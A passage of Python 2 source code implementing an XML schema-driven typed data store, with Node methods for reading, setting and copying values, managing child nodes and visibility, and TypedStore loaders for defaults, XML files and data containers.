if 'afterChange' not in self.eventhandlers: return
if node.isHidden() and self.blockNotifyOfHiddenNodes: return
self.eventhandlers['afterChange'](node,feature)
def onDefaultChange(self,node,feature):
assert isinstance(node,Node), 'Supplied object is not of type "Node" (but "%s").' % node
assert node.isValid(), 'Supplied node %s is invalid (has already been destroyed).' % node
#print 'onDefaultChange'
if self.processDefaultChange==1 or (self.processDefaultChange==0 and not node.hasValue()):
self.onChange(node,feature)
class Node(object):
    """A single node in a typed store: pairs a schema (template) node with the
    corresponding XML value node, and holds the tree of child Node objects.
    """
    def __init__(self,controller,templatenode,valuenode,location,parent):
        """Builds the node and, recursively, Node objects for all children
        declared by the template, matching them to existing value nodes.

        controller: the owning store; templatenode: schema DOM element;
        valuenode: matching value DOM element (or None); location: path
        components from the root; parent: parent Node (None for the root).
        """
        assert templatenode.hasAttribute('name'),'Schema node %s lacks "name" attribute.' % location
        self.controller = controller
        self.templatenode = templatenode
        self.valueroot = valuenode
        self.valuenode = valuenode
        self.location = tuple(location)
        self.parent = parent
        self.children = []
        self.futureindex = None
        self.visible = self.templatenode.getAttribute('hidden')!='True'
        self.grouponly = frozenset(self.templatenode.getAttribute('grouponly').split(';'))
        # Build a dictionary with all child value nodes
        valuechildren = {}
        if self.valueroot is not None:
            for ch in self.valueroot.childNodes:
                if ch.nodeType==ch.ELEMENT_NODE:
                    valuechildren.setdefault(ch.localName,[]).append(ch)
        canhavechildren = False
        for templatechild in self.templatenode.childNodes:
            if templatechild.nodeType==templatechild.ELEMENT_NODE and templatechild.localName=='element':
                childid = templatechild.getAttribute('name')
                canhavechildren = True
                # Get all value nodes that correspond to the current template child.
                childloc = list(self.location) + [childid]
                curvaluechildren = valuechildren.pop(childid,[])
                # Check minimum and maximum occurrences of the node.
                minoccurs = templatechild.getAttribute('minOccurs')
                if minoccurs=='': minoccurs = 1
                maxoccurs = templatechild.getAttribute('maxOccurs')
                if maxoccurs=='': maxoccurs = 1
                minoccurs = int(minoccurs)
                if maxoccurs!='unbounded': maxoccurs = int(maxoccurs)
                assert maxoccurs==1 or minoccurs==0,'Node %s: for maxOccurs %s > 1, minOccurs must currently equal 0, but it is %i.' % (','.join(childloc),maxoccurs,minoccurs)
                assert maxoccurs=='unbounded' or maxoccurs>=minoccurs, 'Node %s: the value of the "maxOccurs" (%i) attribute must be greater than or equal to that of "minOccurs" (%i).' % (','.join(childloc),maxoccurs,minoccurs)
                if maxoccurs!='unbounded' and len(curvaluechildren)>maxoccurs:
                    print 'Node "%s": number of children (%i) is greater than the imposed maximum (%i). Redundant child nodes will be deleted.' % (','.join(childloc),len(curvaluechildren),maxoccurs)
                    for vch in curvaluechildren[maxoccurs:]: self.valueroot.removeChild(vch)
                # Pad with None placeholders up to the required minimum occurrence count.
                for i in range(len(curvaluechildren),minoccurs):
                    curvaluechildren.append(None)
                # Create nodes for all value nodes found.
                for valuechild in curvaluechildren:
                    self.children.append(Node(self.controller,templatechild,valuechild,childloc,parent=self))
        # For nodes that can have children as well as a value, the value is stored in a
        # child node. This child node carries the same name as the parent.
        if canhavechildren and self.canHaveValue():
            curvaluechildren = valuechildren.pop(self.location[-1],(None,))
            assert len(curvaluechildren)<=1, 'Value node (%s) can at most occur 1 time below %s, but it occurs %i times.' % (self.location[-1],self.location,len(curvaluechildren))
            self.valuenode = curvaluechildren[0]
        # Check for existing value nodes that are not in the template.
        for childid,childnodes in valuechildren.iteritems():
            # If this data type builds its own XML structure to store its data, it may
            # use child nodes, so do not complain about the children we do not know about.
            # NOTE(review): getValueType(returnclass=True) appears to return a class, so
            # isinstance(...) here looks like it should be issubclass(...) — confirm.
            if not isinstance(self.getValueType(returnclass=True),datatypes.DataTypeSimple): break
            print 'WARNING! Value "%s" below "%s" was unexpected and will be ignored.' % (childid,self.location)
            for ch in childnodes: self.valueroot.removeChild(ch)
def __str__(self):
"""Returns a string representation of the node.
"""
return str(self.location)
def destroy(self):
"""Deallocates all variables of the node, breaking circular
references.
"""
for ch in self.children:
if ch is not None: ch.destroy()
self.location = ()
self.children = []
self.parent = None
self.templatenode = None
self.valueroot = None
self.valuenode = None
self.controller = None
def isValid(self):
"""Determines whether the node is valid. Returns False only if
"destroy" has been called.
"""
return self.controller is not None
    def getValue(self,usedefault=False):
        """Returns the typed value of the node. This function returns
        None if the node does not have a value yet, and throws an error
        if the node cannot have a value (i.e., it is a container only).

        If usedefault is True, the default value is returned when the node
        has no value of its own.
        """
        value = None
        if self.valuenode is not None:
            valuetype = self.getValueType(returnclass=True)
            try:
                value = valuetype.load(self.valuenode,self.controller.context,self.templatenode)
            except ValueError,e:
                # Prefix the node path so the error identifies which node failed to parse.
                raise ValueError('%s: %s' % ('/'.join(self.location),e))
        if value is None and usedefault: value = self.getDefaultValue()
        return value
def hasValue(self):
if self.valuenode is None: return False
value = self.getValue()
if value is None: return False
if isinstance(value,util.referencedobject): value.release()
return True
def getDefaultValue(self):
"""Returns the default value of the node. This function returns
None if no default value if available, which applies also if
a default store has not been specified.
"""
defaultstore = self.controller.defaultstore
if defaultstore is None: return None
defaultnode = defaultstore.mapForeignNode(self)
if defaultnode is None: return None
return defaultnode.getValue(usedefault=True)
def hasDefaultValue(self):
value = self.getValue()
if value is None: return True
defvalue = self.getDefaultValue()
hasdef = value==defvalue
if isinstance(value, util.referencedobject): value.release()
if isinstance(defvalue,util.referencedobject): defvalue.release()
return hasdef
    def setValue(self,value):
        """Sets the typed value of the node. Returns True if the value
        of the node was changed, False if it was not changed. Changes
        may be prevented by an attached interface disallowing the change.

        NOTE(review): when value is None the node is cleared and None is
        returned (not True/False) — confirm callers do not rely on a boolean.
        """
        if value is None:
            self.clearValue()
            return
        curval = self.getValue()
        changed = False
        if curval!=value:
            # Attached interfaces may veto the change.
            if self.controller.onBeforeChange(self,value):
                valuetype = self.getValueType(returnclass=True)
                # Coerce plain values into the node's data type class.
                if not isinstance(value,valuetype): value = valuetype(value)
                if self.valuenode is None: self.createValueNode()
                changed = value.save(self.valuenode,self.controller.context)
                self.controller.onChange(self,'value')
        # Release the reference taken by getValue for reference-counted values.
        if isinstance(curval,util.referencedobject): curval.release()
        return changed
    def clearValue(self,recursive=False,skipreadonly=False,deleteclones=True):
        """Clears the value of the node. Returns True on success.
        If recursive=True, also clears the value of the descendant nodes; if
        additionally deleteclones=True, all optional descendant nodes are
        deleted completely.
        If skipreadonly is True, the read-only status of nodes if
        respected, implying that their value is not cleared if they have
        the read-only attribute.
        """
        # First clear children.
        cleared = True
        if recursive:
            if deleteclones: self.removeAllChildren(optionalonly=True)
            for ch in self.children:
                if not ch.clearValue(recursive=True,skipreadonly=skipreadonly,deleteclones=deleteclones):
                    cleared = False
        # Do not clear if (1) it is already cleared (result: success), (2) it is
        # read-only and the user wants to respect that (result: failure),
        # (3) it is the root node (result: failure), or (4) clearing the child nodes failed.
        if self.valuenode is None: return True
        if (skipreadonly and self.isReadOnly()) or self.parent is None or not cleared: return False
        # Clear if (1) this node can have no value - it must occur, and (2) the attached interfaces approve.
        if (not self.canHaveClones()) and self.controller.onBeforeChange(self,None):
            # Detach the value node from the DOM; the value root is dropped too if they coincide.
            self.valuenode.parentNode.removeChild(self.valuenode)
            if (self.valueroot==self.valuenode): self.valueroot = None
            self.valuenode = None
            self.controller.onChange(self,'value')
            return True
        else:
            return False
    def getValueAsString(self,addunit = True,usedefault = False):
        """Returns a user-readable string representation of the value of the node.

        If the value corresponds to a predefined option, the option label is
        used; otherwise the data type's pretty string. With addunit set, the
        node's unit (if any) is appended.
        """
        # Get the value - return an empty string if no value is set.
        value = self.getValue(usedefault=usedefault)
        if value is None: return ''
        # Get the XML template node describing the data type, and the Python class representing the type.
        templatenode = self.templatenode
        valuetype = self.getValueType(returnclass=True)
        # Initially we do not have a string representation
        strvalue = None
        # First look if the value was chosen from a list of predefined options.
        if templatenode.hasAttribute('hasoptions'):
            # Get label of currently selected option
            optionsroot = util.findDescendantNode(templatenode,['options'])
            for ch in optionsroot.childNodes:
                if ch.nodeType==ch.ELEMENT_NODE and ch.localName=='option':
                    chvalue = valuetype.fromXmlString(ch.getAttribute('value'),{},templatenode)
                    if value==chvalue:
                        # We found the currently selected option; its label will serve as displayed value.
                        if ch.hasAttribute('label'):
                            strvalue = ch.getAttribute('label')
                        else:
                            strvalue = ch.getAttribute('value')
                        break
        # If we do not have a string representation yet, let the value itself write out the best pretty string.
        if strvalue is None: strvalue = value.toPrettyString()
        # Release the reference to the value if needed.
        if isinstance(value,util.referencedobject): value.release()
        # Append unit specifier (if available)
        if addunit:
            unit = self.getUnit()
            if unit is not None: strvalue += ' ' + unit
        return strvalue
    def addChild(self,childname,position=None,id=None):
        """Adds a new child node; this child node must be optional as
        defined in the template with minOccurs/maxOccurs attributes.
        The new child node is by default appended to the list of existing
        nodes with the same name, or inserted at the specified "position".

        "id" is an optional secondary identifier stored in the child's "id"
        attribute. Returns the new Node, or None if the template does not
        declare a child with this name.
        """
        index = -1
        templatenode = None
        # First see if already one instance of this child is in the tree; that makes finding the position easy.
        existingcount = 0
        for curindex,child in enumerate(self.children):
            if child.location[-1]==childname:
                assert id is None or child.getSecondaryId()!=id, 'Child node with the id "%s" already exists below %s.' % (id,str(self.location))
                index = curindex
                templatenode = child.templatenode
                existingcount += 1
            elif index!=-1:
                # We are at the end of the list of nodes with the specified name. Stop.
                break
        # If no insert position was specified, append at the end
        if position is None: position = existingcount
        if index!=-1:
            # Found an existing node with this name
            assert position>=0, 'Position must be positive, but is %i. Use position=None to append to the end.' % position
            assert position<=existingcount, 'Cannot insert child "%s" at position %i, because only %i nodes exist so far.' % (childname,position,existingcount)
            index = index+1-existingcount+position
        else:
            # Node with this name not yet in tree.
            assert position==0, 'Cannot insert child "%s" at position %i, because no node wih this name exists so far.' % (childname,position)
            # Enumerate over all template children of the parent we want to insert below.
            # Store a list of names of children that precede the node to be inserted.
            predecessors = []
            for templatenode in self.templatenode.childNodes:
                if templatenode.nodeType==templatenode.ELEMENT_NODE and templatenode.localName=='element':
                    childid = templatenode.getAttribute('name')
                    if childid==childname: break
                    predecessors.append(childid)
            else:
                # Could not find the specified child in the template.
                return None
            # Enumerate over all actual children until we reach the point where the child should be inserted.
            index = 0
            for child in self.children:
                curname = child.location[-1]
                while len(predecessors)>0 and curname!=predecessors[0]:
                    predecessors.pop(0)
                if len(predecessors)==0: break
                index += 1
        # Ensure the parent to insert below has a value node
        # (we need to insert the value node below it to give the child life)
        self.createValueNode(rootonly=True)
        # Find the XML document
        doc = self.valueroot
        while doc.parentNode is not None: doc=doc.parentNode
        assert doc.nodeType==doc.DOCUMENT_NODE, 'Could not find DOM document node. Node "%s" does not have a parent.' % doc.tagName
        # Create the value node for the current child
        node = doc.createElementNS(self.valueroot.namespaceURI,childname)
        if id is not None: node.setAttribute('id',id)
        # Insert the value node
        if position>=existingcount:
            valueroot = self.valueroot.appendChild(node)
        else:
            valueroot = self.valueroot.insertBefore(node,self.children[index].valueroot)
        # Create the child (template + value)
        child = Node(self.controller,templatenode,valueroot,list(self.location)+[childname],parent=self)
        assert child.canHaveClones(), 'Cannot add another child "%s" because there can exist only one child with this name.' % childname
        # Set the node visibility before notifying anyone of its presence.
        # For this to work under all circumstances, we need to [temporarily] add the new child.
        self.children.insert(index,child)
        child.updateVisibility(recursive=True,notify=False)
        self.children.pop(index)
        # Insert the child, and notify attached interfaces.
        child.futureindex = index
        self.controller.beforeVisibilityChange(child,True,False)
        self.children.insert(index,child)
        self.controller.afterVisibilityChange(child,True,False)
        child.futureindex = None
        # Return the newly inserted child.
        return child
def createValueNode(self,rootonly=False):
"""Creates the (empty) value node, and creates value nodes for
all ancestors that lacks a value node as well.
"""
if self.valuenode is not None or (rootonly and self.valueroot is not None): return
assert rootonly or self.canHaveValue(),'Asked to create value node for %s, but this node cannot have a value.' % (str(self.location),)
# Build a list of all ancestors that do not have a value root yet.
parents = []
root = self
while root.valueroot is None:
parents.insert(0,root)
root = root.parent
valueroot = root.valueroot
# Find the XML document for values.
doc = valueroot
while doc.parentNode is not None: doc=doc.parentNode
assert doc.nodeType==doc.DOCUMENT_NODE, 'Could not find DOM document node needed to create %s. Node "%s" does not have a parent.' % (location,doc.tagName)
# Create value roots for all ancestors that lack one.
for par in parents:
par.valueroot = doc.createElementNS(valueroot.namespaceURI,par.getId())
valueroot.appendChild(par.valueroot)
valueroot = par.valueroot
if self.canHaveValue() and self.canHaveChildren():
# This node can have a value as well as children, and therefore needs a
# separate value node.
if rootonly: return
self.valuenode = doc.createElementNS(self.valueroot.namespaceURI,self.getId())
self.valueroot.appendChild(self.valuenode)
else:
# This node uses the value root for storing its value.
self.valuenode = self.valueroot
import xml.dom
assert isinstance(self.valueroot,xml.dom.Node),'Value root is not of type xml.dom.Node. Value = %s' % (str(self.valueroot),)
assert isinstance(self.valuenode,xml.dom.Node),'Value node is not of type xml.dom.Node. Value = %s' % (str(self.valuenode),)
def getChildById(self,childname,id,create=False):
"""Gets an optional node (typically a node that can occur more than once)
by its identifier. If the it does not exist yet, and create is True,
the requested node is created (and intermediate nodes as well).
"""
for child in self.children:
if child.location[-1]==childname and child.getSecondaryId()==id:
break
else:
if not create: return None
child = self.addChild(childname,id=id)
return child
def getChildByNumber(self,childname,index,create=False):
"""Gets an optional node (typically a node that can occur more than once)
by its number. If the it does not exist yet, and create is True,
the requested node is created (and intermediate nodes as well).
"""
curindex = 0
for child in self.children:
if child.location[-1]==childname:
if curindex==index: break
curindex += 1
else:
if not create: return None
for ichild in range(index-curindex+1):
child = self.addChild(childname)
return child
    def removeChild(self,childname,id):
        """Removes an optional child node with the specified name and
        id. An id can either be the number (int) of the child node in the list
        with children of that name, or the id (string) set in its "id"
        child node.
        """
        assert isinstance(id,int) or isinstance(id,basestring), 'Specified id must be an integer or a string.'
        if isinstance(id,int):
            # Numeric id: remove exactly the child at that index among same-named children.
            return self.removeChildren(childname,id,id)
        else:
            # String id: locate the child by its secondary id.
            for child in reversed(self.children):
                if child.location[-1]==childname and child.getSecondaryId()==id:
                    self.removeChildNode(child)
                    break
            else:
                assert False, 'Cannot find child "%s" with id "%s".' % (childname,id)
    def removeChildren(self,childname,first=0,last=None):
        """Removes a (range of) optional child nodes with the specified name.
        If the last number to remove is not specified, nodes will be removed
        till the end. "first" and "last" are inclusive indices among the
        children that carry the given name.
        """
        ipos = 0         # position in self.children
        ichildpos = -1   # index among children with the requested name
        while ipos<len(self.children):
            child = self.children[ipos]
            if child.location[-1]==childname:
                assert child.canHaveClones(),'Cannot remove child "%s" because it must occur exactly one time.' % childname
                ichildpos += 1
                if last is not None and ichildpos>last: return
                if ichildpos>=first:
                    self.removeChildNode(child,ipos)
                    # Compensate for the removal so the next child is not skipped.
                    ipos -= 1
            ipos += 1
def removeAllChildren(self,optionalonly=True):
"""Removes all optional child nodes. The "optionalonly" argument
is used internally only to remove every single descendant
of an optional node.
"""
for ipos in range(len(self.children)-1,-1,-1):
child = self.children[ipos]
if (not optionalonly) or child.canHaveClones():
self.removeChildNode(child,ipos)
    def removeChildNode(self,node,pos=None):
        """Removes the given child Node object (located at optional known
        index "pos" in self.children), detaching its value subtree from the
        DOM and notifying attached interfaces before and after removal.
        """
        if pos is None: pos = self.children.index(node)
        # Recursively tear down the child's own subtree first.
        node.removeAllChildren(optionalonly=False)
        self.controller.beforeVisibilityChange(node,False,False)
        self.children.pop(pos)
        if node.valueroot is not None:
            assert self.valueroot is not None,'Child has a value root but the parent does not.'
            self.valueroot.removeChild(node.valueroot)
            node.valueroot = None
            node.valuenode = None
        self.controller.afterVisibilityChange(node,False,False)
        node.destroy()
def getId(self):
"""Returns the id of the node.
"""
return self.location[-1]
def getSecondaryId(self):
"""Returns the secondary id of the node. This is only present for
nodes that can occur multiple times, and must then be set on creation
of the node. Returns an empty string if the secondary id has not been set.
"""
assert self.valueroot is not None, 'The value node has not been set; this node cannot be optional.'
return self.valueroot.getAttribute('id')
def getValueType(self,returnclass=False):
"""Returns the value type of the node; an empty string is returned
if the node cannot have a value.
"""
valuetype = self.templatenode.getAttribute('type')
if returnclass:
if valuetype=='': return None
valuetype = self.controller.getDataType(valuetype)
return valuetype
def getUnit(self):
"""Returns the unit of the node; None is returned if the node
does not have a unit specified.
"""
unit = self.templatenode.getAttribute('unit')
if unit in ('','-'):
unit = None
elif unit[0]=='[' and unit[-1]==']':
node = self.parent[unit[1:-1]]
if node is None: return None
unit = node.getValueAsString(addunit=False,usedefault=True)
return unit
    def getText(self,detail,minimumdetail = 0,capitalize=False):
        """Returns a (template) text describing the node. Depending
        on the "detail" argument, this returns the node id (detail=0),
        the node label (detail=1), or the node description (detail=2).
        If the text within the specified detail is unavailable, text
        with lower detail is looked for down to level "minimumdetail".
        If no text is found that meets the criteria, None is returned.
        If "capitalize" is True, the first letter of the returned text
        is capitalized.
        """
        templatenode = self.templatenode
        ret = None
        # Clonable nodes are identified by their secondary id, if set.
        if self.canHaveClones():
            ret = self.getSecondaryId()
            if ret=='': ret = None
        if ret is None:
            if detail==2 and templatenode.hasAttribute('description'):
                ret = templatenode.getAttribute('description')
            elif detail>=1 and minimumdetail<=1 and templatenode.hasAttribute('label'):
                ret = templatenode.getAttribute('label')
            elif minimumdetail==0:
                ret = self.getId()
        # Capitalize only the first character, leaving the rest untouched.
        if ret is not None and capitalize: ret = ret[0].upper() + ret[1:]
        return ret
def __getitem__(self,path):
assert isinstance(path,basestring), 'Supplied node path is not a string: %s.' % path
return self.getLocation(path.split('/'))
def getLocation(self,location,createoptional=False):
"""Returns the child node at the specified location (a list of
path components - strings).
"""
node = self
for childname in location:
# Read secondary id between square brackets [if any]
secid = None
if childname.endswith(']') and '[' in childname:
istart = childname.rfind('[')
secid = childname[istart+1:-1]
childname = childname[:istart]
if secid.startswith('\'') and secid.endswith('\''):
secid = secid[1:-1]
elif secid.isdigit():
secid = int(secid)
if childname=='..':
# Move one level up
assert self.parent is not None,'Cannot go up one level because we are at the root.'
node = node.parent
elif childname!='' and childname!='.':
# Try to find the requested child node.
ich = 0
for chnode in node.children:
if chnode.location[-1]==childname:
if secid is None or (isinstance(secid,int) and secid==ich) or (isinstance(secid,basestring) and secid==chnode.getSecondaryId()):
node = chnode
break
ich += 1
else:
# Child was not found, but if it is optional it can be created on request.
if createoptional and secid is not None:
if isinstance(secid,basestring):
node = node.addChild(childname,id=secid)
else:
node = node.getChildByNumber(childname,secid,create=True)
if node is None: return None
else:
return None
return node
def getLocationMultiple(self,location):
"""Returns all child nodes at the specified location (a list of
path components - strings).
"""
# Get the first non-empty path term.
path = location[:]
target = ''
while target=='' and len(path)>0: target = path.pop(0)
if target=='': return [self]
res = []
for child in self.children:
if child.location[-1]==target:
if len(path)==0:
res.append(child)
else:
res += child.getLocationMultiple(path)
return res
def isHidden(self):
"""Returns True is the node is currently hidden. Nodes can be hidden
because the template conditions on their visibility are not met,
or because they simply have the "hidden" attribute set in the template.
"""
node = self
while node is not None:
if not node.visible: return True
node = node.parent
return False
def isReadOnly(self):
"""Returns True if the template specifies the read-only attribute
for the node.
Note that settings the read-only attribute does not prevent any
modification of the node value through the API; it is merely a
sign the UI editors not to allow editing of the node.
"""
return self.templatenode.hasAttribute('readonly')
def hasChildren(self):
"""Returns True if the node has children.
"""
return len(self.children)>0
def canHaveValue(self):
"""Returns True if the node can have a value, False if not
(e.g. when the node is a container only).
"""
return self.templatenode.hasAttribute('type')
def canHaveChildren(self):
if len(self.children)>0: return True
for templatechild in self.templatenode.childNodes:
if templatechild.nodeType==templatechild.ELEMENT_NODE and templatechild.localName=='element': return True
return False
def canHaveClones(self):
"""Returns True if the node can occurs more than once.
"""
return self.templatenode.getAttribute('maxOccurs') not in ('','1')
def getDescendants(self):
"""Returns all descendant nodes.
"""
res = [self]
for ch in self.children:
res += ch.getDescendants()
return res
    def getNodesByType(self,valuetype,allowderived=False):
        """Returns all descendant nodes (including this node) with the
        specified data type. "valuetype" may be a type name (string) or a
        data type class; with allowderived set, subclasses match too.
        """
        res = []
        owntype = self.getValueType(returnclass=True)
        # Resolve a type name into the corresponding data type class.
        if isinstance(valuetype,basestring): valuetype = self.controller.getDataType(valuetype)
        if (allowderived and owntype is not None and issubclass(owntype,valuetype)) or owntype==valuetype:
            res.append(self)
        for ch in self.children:
            res += ch.getNodesByType(valuetype,allowderived)
        return res
def getEmptyNodes(self,usedefault=False):
"""Returns all descendant nodes that do not have a value assigned
to them, but are capable of having a value.
"""
res = []
if self.canHaveValue():
value = self.getValue(usedefault=usedefault)
if value is None: res.append(self)
if isinstance(value,util.referencedobject): value.release()
for ch in self.children:
res += ch.getEmptyNodes()
return res
    def updateVisibility(self,recursive=False,notify=True):
        """Updates the dynamic visibility of the node by re-evaluating
        the conditions imposed by the template on the node's visibility.

        With notify set, attached interfaces are informed before and after
        a change in visibility; with recursive set, descendants are
        re-evaluated as well.
        """
        templatenode = self.templatenode
        cond = util.findDescendantNode(templatenode,['condition'])
        if cond is not None:
            shownew = self.controller.checkCondition(cond,self)
            if shownew!=self.visible:
                if notify: self.controller.beforeVisibilityChange(self,shownew)
                self.visible = shownew
                if notify: self.controller.afterVisibilityChange(self,shownew)
        if recursive:
            for child in self.children: child.updateVisibility(recursive=True,notify=notify)
    def copyFrom(self,sourcenode,replace=replaceAlways,matchednodes=None):
        """Recursively copies the value of the current node from the
        specified source node.
        By default, any values of the target node and its children will be
        overwritten with values from the source node. If this is not desired,
        the replace argument can be used to control replacement of values in
        detail (a bitmask of the module-level replace* flags).
        If the matchednodes argument is provided, it must be a dictionary.
        On return, it will contain the target nodes (keys) that have received
        a value from a source node (values).
        """
        if matchednodes is not None: matchednodes[self] = sourcenode
        # Copy node value (if both source and target can have a value)
        if self.canHaveValue() and sourcenode.canHaveValue():
            if replace&replaceExistingValues or not self.hasValue():
                curval = sourcenode.getValue()
                if replace&replaceWithEmpty or curval is not None: self.setValue(curval)
                if isinstance(curval,util.referencedobject): curval.release()
        # If replacing previous contents, remove optional nodes (with minoccurs=0)
        prevchildname = None
        index = 0
        oldchildren = list(self.children)
        for sourcechild in sourcenode.children:
            childname = sourcechild.location[-1]
            # Update the index of this particular child (among others with the same name)
            if childname!=prevchildname:
                index = 0
                prevchildname = childname
            # For the found source node, locate the corresponding node in our own store.
            # For optional nodes, the corresponding node is created if it did not exist yet.
            if sourcechild.canHaveClones():
                secid = sourcechild.getSecondaryId()
                if secid!='':
                    child = self.getChildById(childname,secid,create=True)
                else:
                    child = self.getChildByNumber(childname,index,create=True)
            else:
                child = self[childname]
            # If we do not have this node, ignore it and continue with the next source node.
            if child is None: continue
            # Copy data from the source node.
            child.copyFrom(sourcechild,replace=replace,matchednodes=matchednodes)
            # If this child existed previously, remove it from the list of "orphans"
            # (those nodes that were not present in the source node)
            if child in oldchildren:
                oldchildren.remove(child)
            index += 1
        if replace&replaceRemoveOldChildren:
            # Remove all optional child nodes that were not matched by a child of the source node.
            for ch in oldchildren:
                if ch.canHaveClones(): self.removeChildNode(ch)
# ------------------------------------------------------------------------------------------
# TypedStore
# ------------------------------------------------------------------------------------------
def createStoreClass(name,schemainfodir):
    """Dynamically creates a TypedStore subclass bound to the given schema
    info directory."""
    attrs = {'schemainfodir':schemainfodir}
    return type(name,(TypedStore,),attrs)
# TypedStore: encapsulates the above store.
# Adds the use of a second XML document (template) that describes the data types
# of the nodes of the first DOM, and that describes dependencies between nodes.
# Any node in the original document for which conditions are not met is hidden.
# Nodes that are not described by the template are not allowed in the property store.
# Nodes are obtained by traversing the tree (start: TypedStore.root).
class TypedStore(util.referencedobject):
schemainfodir = None
version2defaultstore = None
@classmethod
def getSchemaInfo(cls):
"""Returns a SchemaInfo object that contains information on available schemas, converters, etc.
This method may be overridden by deriving classes if they want to make pre-made schemas,
converters and such available.
"""
if cls.schemainfodir is not None: return schemainfocache[cls.schemainfodir]
return SchemaInfo()
    @classmethod
    def getDefault(cls,version):
        """Returns a TypedStore with the set of default value identified by
        the specified name, converted to the specified version if needed.
        To use this, the deriving class MUST implement getSchemaInfo!

        Results are cached per version in cls.version2defaultstore; cached
        stores are released at interpreter exit via atexit.
        """
        import atexit
        # The base class has no schema information and therefore no defaults.
        if cls==TypedStore: return None
        if cls.version2defaultstore is None: cls.version2defaultstore = {}
        # If we have defaults for the requested version in our cache, return these.
        if version in cls.version2defaultstore: return cls.version2defaultstore[version]
        # Function for filling in default values for linked-in templates.
        # (recurses into getDefault of a dynamically created store class per linked schema)
        def addDefaultsForLinks(store):
            for node in store.root.getDescendants():
                if node.templatenode.hasAttribute('sourcepath') and node.templatenode.getAttribute('version') and node.valueroot is None:
                    # The template for this node was linked in, and we do not have any default values for it yet.
                    srcdir = os.path.dirname(node.templatenode.getAttribute('sourcepath'))
                    subcls = createStoreClass('dummy',srcdir)
                    defs = subcls.getDefault(node.templatenode.getAttribute('version'))
                    if defs is not None: node.copyFrom(defs.root)
        # Get a dictionary linking versions to paths for default values.
        version2path = cls.getSchemaInfo().getDefaults()
        # If no defaults are available, return None.
        if not version2path: return None
        # Select the file with defaults to load.
        if version in version2path:
            # Default values are present for the requested version; use these.
            path = version2path[version]
        else:
            # No default values present for the requested version.
            # Use the first values available - we will attempt conversion to the desired version.
            path = version2path.values()[0]
        # Load the selected defaults from file.
        sourcestore = cls.fromXmlFile(path,adddefault=False)
        addDefaultsForLinks(sourcestore)
        atexit.register(TypedStore.release,sourcestore)
        cls.version2defaultstore[sourcestore.version] = sourcestore
        # If the loaded defaults already have the right version, return them.
        if sourcestore.version==version: return sourcestore
        # Loaded defaults have the wrong version. Attempt conversion to desired version.
        defstore = cls.fromSchemaName(version,adddefault=False)
        sourcestore.convert(defstore,usedefaults=False)
        addDefaultsForLinks(defstore)
        atexit.register(TypedStore.release,defstore)
        cls.version2defaultstore[version] = defstore
        return defstore
@classmethod
def fromSchemaName(cls,schemaname,*args,**kwargs):
"""Returns a TypedStore based on the schema identified by the specified
name.
To use this, the deriving class MUST implement getSchemaInfo!
"""
assert cls!=TypedStore, 'fromSchemaName cannot be called on base class "TypedStore", only on derived classes. You need to create a derived class with versioning support.'
schemapath = cls.getSchemaInfo().getSchemas().get(schemaname,None)
if schemapath is None:
raise Exception('Unable to locate XML schema file for "%s". Available: %s' % (schemaname,', '.join(cls.getSchemaInfo().getSchemas().keys())))
kwargs['schema'] = schemapath
store = cls(*args,**kwargs)
return store
@classmethod
def fromXmlFile(cls,path,targetstore=None,**kwargs):
"""Returns a TypedStore for the values at the specified path (XML file).
The values file is openend, its version identifier retrieved. Then the
program attempt to created the required schema. For this to work,
the deriving class must implement getSchemaInfo.
Additional named arguments are passes to the constructor (__init__)
of the data store class.
"""
container = None
if isinstance(path,datatypes.DataFile):
# XML file is provided as DataFile object.
f = path.getAsReadOnlyFile()
try:
valuedom = xml.dom.minidom.parse(f)
except Exception,e:
raise Exception('Unable to parse as XML: '+unicode(e))
f.close()
else:
# XML file is provided as a path.
if not os.path.isfile(path):
raise Exception('Specified path "%s" does not exist, or is not a file.' % path)
try:
valuedom = xml.dom.minidom.parse(path)
except Exception,e:
raise Exception('"%s" does not contain valid XML: %s' % (path,unicode(e)))
container = datatypes.DataContainerDirectory(os.path.dirname(os.path.abspath(path)))
# Get version of the XML file.
version = valuedom.documentElement.getAttribute('version')
# If no target store was provided, create one for the version of the XML file.
if targetstore is None: targetstore = cls.fromSchemaName(version,**kwargs)
# Make sure the names of the root element match in schema and values file.
schemarootname = targetstore.schema.getRoot().getAttribute('name')
if valuedom.documentElement.localName!=schemarootname:
raise Exception('Name of XML root node (%s) does not match root identifier in schema specification (%s).' % (valuedom.documentElement.localName,schemarootname))
if targetstore.version!=version and version!='':
# The version of the loaded values does not match the version of the target store; convert it.
if util.verbose: print 'Value file "%s" has version "%s"; starting conversion to "%s".' % (path,version,targetstore.version)
tempstore = cls.fromSchemaName(version)
tempstore.setStore(valuedom)
if container is not None:
tempstore.setContainer(container)
container.release()
tempstore.convert(targetstore)
tempstore.release()
targetstore.originalversion = version
else:
# Versions of target store and values file match; supply the values to the store.
targetstore.setStore(valuedom)
if container is not None:
targetstore.setContainer(container)
container.release()
return targetstore
@classmethod
def fromContainer(cls,path,callback=None,targetstore=None,**kwargs):
"""Loads values plus associated data from the specified path. The path should point
to a valid data container, i.e., a ZIP file, TAR/GZ file, or a directory. The source
container typically has been saved through the "saveAll" method.
Additional named arguments are passes to the constructor (__init__)
of the data store class.
"""
if isinstance(path,basestring):
# Container is provided as a string [path name]
container = datatypes.DataContainer.fromPath(path)
elif isinstance(path,datatypes.DataContainer):
# Container is provided as DataContainer object.
container = path.addref()
elif isinstance(path,datatypes.DataFile):
# Container is provided as a DataFile (an object in another container)
# In this case, the DataFile must be a ZIP file.
container = datatypes.DataContainerZip(path)
else:
assert False,'Supplied source must be a path, a data container object or a data file object.'
# Get list of files in source container.
files = container.listFiles()
# Get a descriptive name for the package, to be used in diagnostic and error messages.
packagetitle = getattr(cls,'packagetitle','packaged XLM store')
# Check for existence of XML values file.
storefilenames = cls.getSchemaInfo().getPackagedValuesNames()
for storefilename in storefilenames:
if storefilename in files: break
else:
storefilenames = ['"%s"' % n for n in storefilenames]
strstorefilenames = storefilenames[-1]
if len(storefilenames)>1: strstorefilenames = '%s or %s' % (', '.join(storefilenames[:-1]),strstorefilenames)
raise Exception('The specified source does not contain %s and can therefore not be a %s.' % (strstorefilenames,packagetitle))
# Report that we are beginning to load.
if callback is not None: callback(0.,'parsing XML')
# Read and parse the XML values file.
datafile = container.getItem(storefilename)
f = datafile.getAsReadOnlyFile()
storedom = xml.dom.minidom.parse(f)
f.close()
datafile.release()
# Get the version of the values file.
version = storedom.documentElement.getAttribute('version')
# If no target store was provided, create one for the version of the XML values file.
if targetstore is None: targetstore = cls.fromSchemaName(version,**kwargs)
